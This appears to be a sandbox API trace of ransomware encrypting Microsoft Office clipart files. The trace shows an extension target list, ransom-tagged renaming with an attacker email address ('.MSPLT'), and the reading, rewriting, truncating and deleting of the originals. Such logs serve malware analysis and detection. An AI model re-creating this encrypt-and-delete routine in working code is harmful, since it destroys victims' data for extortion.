[0309.745] lstrlenW (lpString=".docx") returned 5 [0309.745] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.745] lstrlenW (lpString=".pdf") returned 4 [0309.745] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.745] lstrlenW (lpString=".xls") returned 4 [0309.745] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0309.745] lstrlenW (lpString=".xlsx") returned 5 [0309.745] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0309.746] lstrlenW (lpString=".ppt") returned 4 [0309.746] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0309.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.746] lstrlenW (lpString=".zip") returned 4 [0309.746] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0309.746] lstrlenW (lpString=".rar") returned 4 [0309.746] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0309.746] lstrlenW (lpString=".bz2") returned 4 [0309.746] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0309.746] lstrlenW (lpString=".7z") returned 3 [0309.746] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0309.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.746] lstrlenW (lpString=".dbf") returned 4 [0309.746] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0309.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.746] lstrlenW (lpString=".1cd") returned 4 [0309.747] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0309.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.747] lstrlenW (lpString=".jpg") returned 4 [0309.747] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0309.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.747] lstrlenW (lpString=".doc") returned 4 [0309.747] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0309.747] lstrlenW (lpString=".docx") returned 5 [0309.747] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.748] lstrlenW (lpString=".pdf") returned 4 [0309.748] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.748] lstrlenW (lpString=".xls") returned 4 [0309.748] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0309.748] lstrlenW (lpString=".xlsx") returned 5 [0309.748] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0309.748] lstrlenW (lpString=".ppt") returned 4 [0309.748] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0309.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.748] lstrlenW (lpString=".zip") returned 4 [0309.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0309.748] lstrlenW (lpString=".rar") returned 4 [0309.748] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0309.748] lstrlenW (lpString=".bz2") returned 4 [0309.748] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0309.748] lstrlenW (lpString=".7z") returned 3 [0309.748] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0309.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.748] lstrlenW (lpString=".dbf") returned 4 [0309.749] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0309.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.749] lstrlenW (lpString=".1cd") returned 4 [0309.749] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0309.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.749] lstrlenW (lpString=".jpg") returned 4 [0309.749] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0309.749] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0309.749] lstrlenW (lpString="BOATINST.WMF") returned 12 [0309.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0309.750] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=29004) returned 1 [0309.750] CloseHandle (hObject=0x520) returned 1 [0309.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf")) returned 0x220 [0309.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0309.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0309.751] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.751] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0309.753] GetLastError () returned 0x0 [0309.753] ReadFile (in: hFile=0x520, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x714c, lpOverlapped=0x0) returned 1 [0310.312] WriteFile (in: hFile=0x51c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x7150, lpOverlapped=0x0) returned 1 [0310.314] ReadFile (in: hFile=0x520, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0310.314] WriteFile (in: hFile=0x51c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0310.314] SetEndOfFile (hFile=0x51c) returned 1 [0310.315] CloseHandle (hObject=0x51c) returned 1 [0310.320] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.320] SetEndOfFile (hFile=0x520) returned 1 [0310.325] CloseHandle (hObject=0x520) returned 1 [0310.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0310.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.327] lstrlenW (lpString=".doc") returned 4 [0310.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.327] lstrlenW (lpString=".docx") returned 5 [0310.327] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0310.327] lstrlenW (lpString=".pdf") returned 4 [0310.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.327] lstrlenW (lpString=".xls") returned 4 [0310.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.327] lstrlenW (lpString=".xlsx") returned 5 [0310.327] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0310.327] lstrlenW (lpString=".ppt") returned 4 [0310.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString=".zip") returned 4 [0310.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.328] lstrlenW (lpString=".rar") returned 4 [0310.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString=".bz2") returned 4 [0310.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString=".7z") returned 3 [0310.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString=".dbf") returned 4 [0310.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString=".1cd") returned 4 [0310.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString=".jpg") returned 4 [0310.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.328] lstrlenW (lpString=".doc") returned 4 [0310.328] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString=".docx") returned 5 [0310.328] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0310.328] lstrlenW (lpString=".pdf") returned 4 [0310.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.328] lstrlenW (lpString=".xls") returned 4 [0310.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.329] lstrlenW (lpString=".xlsx") returned 5 [0310.329] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0310.329] lstrlenW (lpString=".ppt") returned 4 [0310.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.329] lstrlenW (lpString=".zip") returned 4 [0310.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.329] lstrlenW (lpString=".rar") returned 4 [0310.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.329] lstrlenW (lpString=".bz2") returned 4 [0310.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.329] lstrlenW (lpString=".7z") returned 3 [0310.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.329] lstrlenW (lpString=".dbf") returned 4 [0310.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.329] lstrlenW (lpString=".1cd") returned 4 [0310.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0310.329] lstrlenW (lpString=".jpg") returned 4 [0310.329] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.329] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.330] lstrlenW (lpString="BS00076_.WMF") returned 12 [0310.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0310.330] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=1330) returned 1 [0310.330] CloseHandle (hObject=0x520) returned 1 [0310.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf")) returned 0x220 [0310.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0310.331] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.331] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0310.332] GetLastError () returned 0x0 [0310.332] ReadFile (in: hFile=0x520, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x532, lpOverlapped=0x0) returned 1 [0311.458] WriteFile (in: hFile=0x51c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x540, lpOverlapped=0x0) returned 1 [0311.460] ReadFile (in: hFile=0x520, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0311.460] WriteFile (in: hFile=0x51c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0311.460] SetEndOfFile (hFile=0x51c) returned 1 [0311.460] CloseHandle (hObject=0x51c) returned 1 [0311.462] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0311.462] SetEndOfFile (hFile=0x520) returned 1 [0311.465] CloseHandle (hObject=0x520) returned 1 [0311.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0311.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0311.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.467] lstrlenW (lpString=".doc") returned 4 [0311.467] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0311.467] lstrlenW (lpString=".docx") returned 5 [0311.467] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0311.467] lstrlenW (lpString=".pdf") returned 4 [0311.467] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0311.467] lstrlenW (lpString=".xls") returned 4 [0311.467] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0311.467] lstrlenW (lpString=".xlsx") returned 5 [0311.467] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0311.467] lstrlenW (lpString=".ppt") returned 4 [0311.467] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0311.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.467] lstrlenW (lpString=".zip") returned 4 [0311.467] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0311.467] lstrlenW (lpString=".rar") returned 4 [0311.467] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0311.467] lstrlenW (lpString=".bz2") returned 4 [0311.467] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0311.467] lstrlenW (lpString=".7z") returned 3 [0311.467] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0311.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString=".dbf") returned 4 [0311.468] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString=".1cd") returned 4 [0311.468] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString=".jpg") returned 4 [0311.468] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString=".doc") returned 4 [0311.468] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString=".docx") returned 5 [0311.468] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0311.468] lstrlenW (lpString=".pdf") returned 4 [0311.468] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString=".xls") returned 4 [0311.468] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0311.468] lstrlenW (lpString=".xlsx") returned 5 [0311.468] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0311.468] lstrlenW (lpString=".ppt") returned 4 [0311.468] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0311.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.468] lstrlenW (lpString=".zip") returned 4 [0311.468] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0311.469] lstrlenW (lpString=".rar") returned 4 [0311.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0311.469] lstrlenW (lpString=".bz2") returned 4 [0311.469] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0311.469] lstrlenW (lpString=".7z") returned 3 [0311.469] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0311.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.469] lstrlenW (lpString=".dbf") returned 4 [0311.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0311.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.469] lstrlenW (lpString=".1cd") returned 4 [0311.469] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0311.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0311.469] lstrlenW (lpString=".jpg") returned 4 [0311.469] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0311.469] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0311.469] lstrlenW (lpString="BS00186_.WMF") returned 12 [0311.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.237] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=12788) returned 1 [0312.237] CloseHandle (hObject=0x528) returned 1 [0312.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf")) returned 0x220 [0312.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.238] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.238] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0312.245] GetLastError () returned 0x0 [0312.245] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x31f4, lpOverlapped=0x0) returned 1 [0312.276] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x3200, lpOverlapped=0x0) returned 1 [0312.278] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.279] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0312.279] SetEndOfFile (hFile=0x520) returned 1 [0312.279] CloseHandle (hObject=0x520) returned 1 [0312.290] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.290] SetEndOfFile (hFile=0x528) returned 1 [0312.294] CloseHandle (hObject=0x528) returned 1 [0312.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0312.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.296] lstrlenW (lpString=".doc") returned 4 [0312.296] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.297] lstrlenW (lpString=".docx") returned 5 [0312.297] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.297] lstrlenW (lpString=".pdf") returned 4 [0312.297] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.297] lstrlenW (lpString=".xls") returned 4 [0312.297] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.297] lstrlenW (lpString=".xlsx") returned 5 [0312.297] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.297] lstrlenW (lpString=".ppt") returned 4 